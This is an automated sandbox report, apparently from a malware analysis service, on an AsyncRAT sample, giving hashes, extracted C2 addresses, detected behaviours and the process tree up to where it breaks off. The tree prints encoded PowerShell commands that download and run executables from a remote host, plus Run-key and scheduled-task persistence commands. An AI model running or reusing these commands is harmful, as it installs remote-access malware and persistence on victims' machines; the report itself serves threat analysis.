asyncrat | c6dda31fa6cb4ce140f62c9ce604672fa4a9ba5d1792f2d77f3cfcb43b3227ac

max time kernel
148s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
13-12-2022 03:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RustExternal_nls.exe
Size

658KB
MD5

1ab8dbca5e2bba39723f00907d266de7
SHA1

729cb808637568f20ac886b3fac5f3cf5ff01dee
SHA256

c6dda31fa6cb4ce140f62c9ce604672fa4a9ba5d1792f2d77f3cfcb43b3227ac
SHA512

d1a31848eb9b683793afd36031ef8078ff962c2526272782cf2fca8db11afb71643a46b9ad6bce3ba8dba1b638672205726f6e96c7dd3e887228a2368ec08081
SSDEEP

12288:3oSO5i2eVUIvybKcEz4MM7S9HdKINesX7j6p9PI8GS0oN2:3ouTVUIvtH4H7aLeO23gRoY

Score

10^/10

asyncrat defendersmartscren system guard runtime persistence rat upx

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

System Guard Runtime

85.105.88.221:2531

Mutex

System Guard Runtime

Attributes

delay
3
install
false
install_file
System Guard Runtime
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

DefenderSmartScren

217.64.31.3:8437

Mutex

DefenderSmartScren

Attributes

delay
3
install
false
install_file
SecurityHealtheurvice.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 2 IoCs

rat

resource	yara_rule
behavioral2/memory/3624-235-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral2/memory/1388-274-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

Blocklisted process makes network request 6 IoCs

flow	pid	Process
46	628	powershell.exe
60	216	powershell.exe
80	4348	powershell.exe
84	792	powershell.exe
88	1652	powershell.exe
91	3616	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 16 IoCs

pid	Process
3164	DEFENDERFILESECURITY.EXE
1748	0.exe
2768	EXOfZnk0wP.exe
2772	Sgb0cwt2cl.exe
4280	nZrtLgIkmg.exe
3800	zujtFLcRM6.exe
3420	2C1xlgOnY7.exe
3620	UIucsqmCiI.exe
4836	ryGyA34HDf.exe
3016	2133.exe
376	213123.exe
828	21311123.exe
3104	2131112123.exe
2216	aasddfsa.exe
440	2133.exe
4344	aas1ddfsa.exe

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0005000000000725-141.dat	upx
behavioral2/files/0x0005000000000725-142.dat	upx
behavioral2/memory/3164-143-0x00007FF799B90000-0x00007FF799CEF000-memory.dmp	upx
behavioral2/memory/3164-146-0x00007FF799B90000-0x00007FF799CEF000-memory.dmp	upx
behavioral2/files/0x000400000001e705-149.dat	upx
behavioral2/files/0x000400000001e705-148.dat	upx
behavioral2/memory/1748-150-0x00007FF7B2FE0000-0x00007FF7B3143000-memory.dmp	upx
behavioral2/memory/1748-191-0x00007FF7B2FE0000-0x00007FF7B3143000-memory.dmp	upx

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	Sgb0cwt2cl.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	nZrtLgIkmg.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	zujtFLcRM6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	2C1xlgOnY7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	UIucsqmCiI.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	ryGyA34HDf.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	EXOfZnk0wP.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemGuardRuntime = "C:\\Users\\Admin\\AppData\\Roaming\\SystemGuardRuntime\\SystemGuardRuntime.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealthService = "C:\\Users\\Admin\\AppData\\Roaming\\SecurityHealthService\\SecurityHealthService.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\OperaSetups = "C:\\Users\\Admin\\AppData\\Roaming\\RuntimeBroker\\RuntimeBroker.exe"	aas1ddfsa.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 800 set thread context of 4408	800	RustExternal_nls.exe	85
PID 376 set thread context of 3624	376	213123.exe	143
PID 3016 set thread context of 3568	3016	2133.exe	151
PID 3104 set thread context of 1388	3104	2131112123.exe	156
PID 828 set thread context of 4608	828	21311123.exe	161
PID 440 set thread context of 2316	440	2133.exe	168

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2180	2216	WerFault.exe	162

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
3752	schtasks.exe
1456	schtasks.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\Local Settings	RegAsm.exe
Key created	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\Local Settings	OpenWith.exe

Suspicious behavior: EnumeratesProcesses 34 IoCs

pid	Process
800	RustExternal_nls.exe
800	RustExternal_nls.exe
628	powershell.exe
628	powershell.exe
216	powershell.exe
216	powershell.exe
628	powershell.exe
4348	powershell.exe
4348	powershell.exe
216	powershell.exe
216	powershell.exe
792	powershell.exe
792	powershell.exe
1652	powershell.exe
1652	powershell.exe
4348	powershell.exe
3616	powershell.exe
3616	powershell.exe
792	powershell.exe
1652	powershell.exe
436	powershell.exe
436	powershell.exe
3616	powershell.exe
436	powershell.exe
376	213123.exe
376	213123.exe
376	213123.exe
376	213123.exe
2744	powershell.exe
2744	powershell.exe
2744	powershell.exe
3608	powershell.exe
3608	powershell.exe
3608	powershell.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeDebugPrivilege	800	RustExternal_nls.exe
Token: SeDebugPrivilege	628	powershell.exe
Token: SeDebugPrivilege	216	powershell.exe
Token: SeDebugPrivilege	4348	powershell.exe
Token: SeDebugPrivilege	792	powershell.exe
Token: SeDebugPrivilege	1652	powershell.exe
Token: SeDebugPrivilege	3616	powershell.exe
Token: SeDebugPrivilege	436	powershell.exe
Token: SeDebugPrivilege	376	213123.exe
Token: SeDebugPrivilege	2744	powershell.exe
Token: SeDebugPrivilege	3016	2133.exe
Token: SeDebugPrivilege	3608	powershell.exe
Token: SeDebugPrivilege	828	21311123.exe
Token: SeDebugPrivilege	440	2133.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1160	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 800 wrote to memory of 4604	800	RustExternal_nls.exe	84
PID 800 wrote to memory of 4604	800	RustExternal_nls.exe	84
PID 800 wrote to memory of 4604	800	RustExternal_nls.exe	84
PID 800 wrote to memory of 4408	800	RustExternal_nls.exe	85
PID 800 wrote to memory of 4408	800	RustExternal_nls.exe	85
PID 800 wrote to memory of 4408	800	RustExternal_nls.exe	85
PID 800 wrote to memory of 4408	800	RustExternal_nls.exe	85
PID 800 wrote to memory of 4408	800	RustExternal_nls.exe	85
PID 800 wrote to memory of 4408	800	RustExternal_nls.exe	85
PID 800 wrote to memory of 4408	800	RustExternal_nls.exe	85
PID 800 wrote to memory of 4408	800	RustExternal_nls.exe	85
PID 800 wrote to memory of 4408	800	RustExternal_nls.exe	85
PID 800 wrote to memory of 4408	800	RustExternal_nls.exe	85
PID 4408 wrote to memory of 3164	4408	RegAsm.exe	86
PID 4408 wrote to memory of 3164	4408	RegAsm.exe	86
PID 3164 wrote to memory of 3920	3164	DEFENDERFILESECURITY.EXE	90
PID 3164 wrote to memory of 3920	3164	DEFENDERFILESECURITY.EXE	90
PID 3920 wrote to memory of 1748	3920	cmd.exe	92
PID 3920 wrote to memory of 1748	3920	cmd.exe	92
PID 1748 wrote to memory of 3592	1748	0.exe	96
PID 1748 wrote to memory of 3592	1748	0.exe	96
PID 3592 wrote to memory of 2768	3592	cmd.exe	98
PID 3592 wrote to memory of 2768	3592	cmd.exe	98
PID 1748 wrote to memory of 1300	1748	0.exe	99
PID 1748 wrote to memory of 1300	1748	0.exe	99
PID 1300 wrote to memory of 2772	1300	cmd.exe	101
PID 1300 wrote to memory of 2772	1300	cmd.exe	101
PID 2768 wrote to memory of 628	2768	EXOfZnk0wP.exe	102
PID 2768 wrote to memory of 628	2768	EXOfZnk0wP.exe	102
PID 2772 wrote to memory of 216	2772	Sgb0cwt2cl.exe	104
PID 2772 wrote to memory of 216	2772	Sgb0cwt2cl.exe	104
PID 1748 wrote to memory of 4860	1748	0.exe	106
PID 1748 wrote to memory of 4860	1748	0.exe	106
PID 4860 wrote to memory of 4280	4860	cmd.exe	108
PID 4860 wrote to memory of 4280	4860	cmd.exe	108
PID 1748 wrote to memory of 4988	1748	0.exe	109
PID 1748 wrote to memory of 4988	1748	0.exe	109
PID 1748 wrote to memory of 4624	1748	0.exe	111
PID 1748 wrote to memory of 4624	1748	0.exe	111
PID 4988 wrote to memory of 3800	4988	cmd.exe	114
PID 4988 wrote to memory of 3800	4988	cmd.exe	114
PID 4280 wrote to memory of 4348	4280	nZrtLgIkmg.exe	115
PID 4280 wrote to memory of 4348	4280	nZrtLgIkmg.exe	115
PID 4624 wrote to memory of 3420	4624	cmd.exe	117
PID 4624 wrote to memory of 3420	4624	cmd.exe	117
PID 1748 wrote to memory of 1460	1748	0.exe	118
PID 1748 wrote to memory of 1460	1748	0.exe	118
PID 3800 wrote to memory of 792	3800	zujtFLcRM6.exe	119
PID 3800 wrote to memory of 792	3800	zujtFLcRM6.exe	119
PID 1748 wrote to memory of 4036	1748	0.exe	122
PID 1748 wrote to memory of 4036	1748	0.exe	122
PID 3420 wrote to memory of 1652	3420	2C1xlgOnY7.exe	126
PID 3420 wrote to memory of 1652	3420	2C1xlgOnY7.exe	126
PID 1460 wrote to memory of 3620	1460	cmd.exe	125
PID 1460 wrote to memory of 3620	1460	cmd.exe	125
PID 4036 wrote to memory of 4836	4036	cmd.exe	127
PID 4036 wrote to memory of 4836	4036	cmd.exe	127
PID 3620 wrote to memory of 3616	3620	UIucsqmCiI.exe	128
PID 3620 wrote to memory of 3616	3620	UIucsqmCiI.exe	128
PID 4836 wrote to memory of 436	4836	ryGyA34HDf.exe	130
PID 4836 wrote to memory of 436	4836	ryGyA34HDf.exe	130
PID 628 wrote to memory of 3016	628	powershell.exe	134
PID 628 wrote to memory of 3016	628	powershell.exe	134
PID 628 wrote to memory of 3016	628	powershell.exe	134

C:\Users\Admin\AppData\Local\Temp\RustExternal_nls.exe
"C:\Users\Admin\AppData\Local\Temp\RustExternal_nls.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:800
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  #cmd
  2⤵
  PID:4604
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  #cmd
  2⤵
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4408
- - C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE
    "C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3164
  - - C:\Windows\system32\cmd.exe
      "cmd" /C C:\Users\Admin\AppData\Local\Temp\0.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3920
    - - C:\Users\Admin\AppData\Local\Temp\0.exe
        
        C:\Users\Admin\AppData\Local\Temp\0.exe
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1748
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\EXOfZnk0wP.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3592
        
        C:\Users\Admin\AppData\Local\Temp\EXOfZnk0wP.exe
        
        C:\Users\Admin\AppData\Local\Temp\EXOfZnk0wP.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:2768
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAagByACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADUAMQA5ADMAMwAzADUAOAA1ADEAMgA0ADIAMgA5ADkAMgAvADEAMAA1ADEAOQAzADcAOAAyADIAOAA1ADgAMgA5ADcANAAyADYALwBwAGwAbABtAG0AZABpAGkAcABtAC4AZQB4AGUAJwAsACAAPAAjAG0AawBrACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAawB6AHYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcQBsAHEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMgAxADMAMwAuAGUAeABlACcAKQApADwAIwB5AGUAagAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB4AHcAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBjAHQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMgAxADMAMwAuAGUAeABlACcAKQA8ACMAcQBnAGwAIwA+AA=="
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:628
        
        C:\Users\Admin\AppData\Roaming\2133.exe
        
        "C:\Users\Admin\AppData\Roaming\2133.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:3016
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        10⤵
        
        PID:3568
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\Sgb0cwt2cl.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1300
        
        C:\Users\Admin\AppData\Local\Temp\Sgb0cwt2cl.exe
        
        C:\Users\Admin\AppData\Local\Temp\Sgb0cwt2cl.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:2772
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYgBlACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQAxADkAMwAzADMANQA4ADUAMQAyADQAMgAyADkAOQAyAC8AMQAwADUAMQA5ADMANwA4ADQAOQAyADUANwAyADUAMAA4ADMAOAAvAEMAUgAuAGUAeABlACcALAAgADwAIwBkAGMAbgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGgAcQB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHcAdABlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIAMQAzADEAMgAzAC4AZQB4AGUAJwApACkAPAAjAGoAcwBoACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGUAYQBuACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBzAHYAbQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAyADEAMwAxADIAMwAuAGUAeABlACcAKQA8ACMAbQBkAGsAIwA+AA=="
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:216
        
        C:\Users\Admin\AppData\Roaming\213123.exe
        
        "C:\Users\Admin\AppData\Roaming\213123.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:376
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime' -Value '"C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe"' -PropertyType 'String'
        10⤵
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2744
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /C schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
        10⤵
        
        PID:4040
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
        11⤵
        Creates scheduled task(s)
        
        PID:3752
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        #cmd
        10⤵
        
        PID:4920
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        #cmd
        10⤵
        
        PID:3844
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        #cmd
        10⤵
        
        PID:3624
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
        10⤵
        Creates scheduled task(s)
        
        PID:1456
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\nZrtLgIkmg.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4860
        
        C:\Users\Admin\AppData\Local\Temp\nZrtLgIkmg.exe
        
        C:\Users\Admin\AppData\Local\Temp\nZrtLgIkmg.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:4280
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAdwB6ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQAxADkAMwAzADMANQA4ADUAMQAyADQAMgAyADkAOQAyAC8AMQAwADUAMQA5ADMANwA5ADMANAAwADQANQAwADkAMwA5ADUAOQAvAGwAYwBvAG0AcABsAGMAbQBwAG8ALgBlAHgAZQAnACwAIAA8ACMAeQBnAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBlAGwAeQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB6AHoAZAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAyADEAMwAxADEAMQAyADMALgBlAHgAZQAnACkAKQA8ACMAeQBzAHoAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBxAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGIAdQBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIAMQAzADEAMQAxADIAMwAuAGUAeABlACcAKQA8ACMAYgBqAHYAIwA+AA=="
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4348
        
        C:\Users\Admin\AppData\Roaming\21311123.exe
        
        "C:\Users\Admin\AppData\Roaming\21311123.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:828
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        10⤵
        
        PID:4608
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\zujtFLcRM6.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4988
        
        C:\Users\Admin\AppData\Local\Temp\zujtFLcRM6.exe
        
        C:\Users\Admin\AppData\Local\Temp\zujtFLcRM6.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:3800
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAdQB6ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQAxADkAMwAzADMANQA4ADUAMQAyADQAMgAyADkAOQAyAC8AMQAwADUAMQA5ADMAOAAwADQAMQA1ADYANgAwADgANQAyADEAMQAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC4AZQB4AGUAJwAsACAAPAAjAHIAbABiACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYgBiAGIAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbABnAGcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMgAxADMAMQAxADEAMgAxADIAMwAuAGUAeABlACcAKQApADwAIwByAGgAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBxAGEAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAYgBhAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMgAxADMAMQAxADEAMgAxADIAMwAuAGUAeABlACcAKQA8ACMAbABzAHYAIwA+AA=="
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:792
        
        C:\Users\Admin\AppData\Roaming\2131112123.exe
        
        "C:\Users\Admin\AppData\Roaming\2131112123.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3104
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService' -Value '"C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe"' -PropertyType 'String'
        10⤵
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3608
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        #cmd
        10⤵
        
        PID:1388
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /C schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
        10⤵
        
        PID:376
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\2C1xlgOnY7.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4624
        
        C:\Users\Admin\AppData\Local\Temp\2C1xlgOnY7.exe
        
        C:\Users\Admin\AppData\Local\Temp\2C1xlgOnY7.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:3420
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
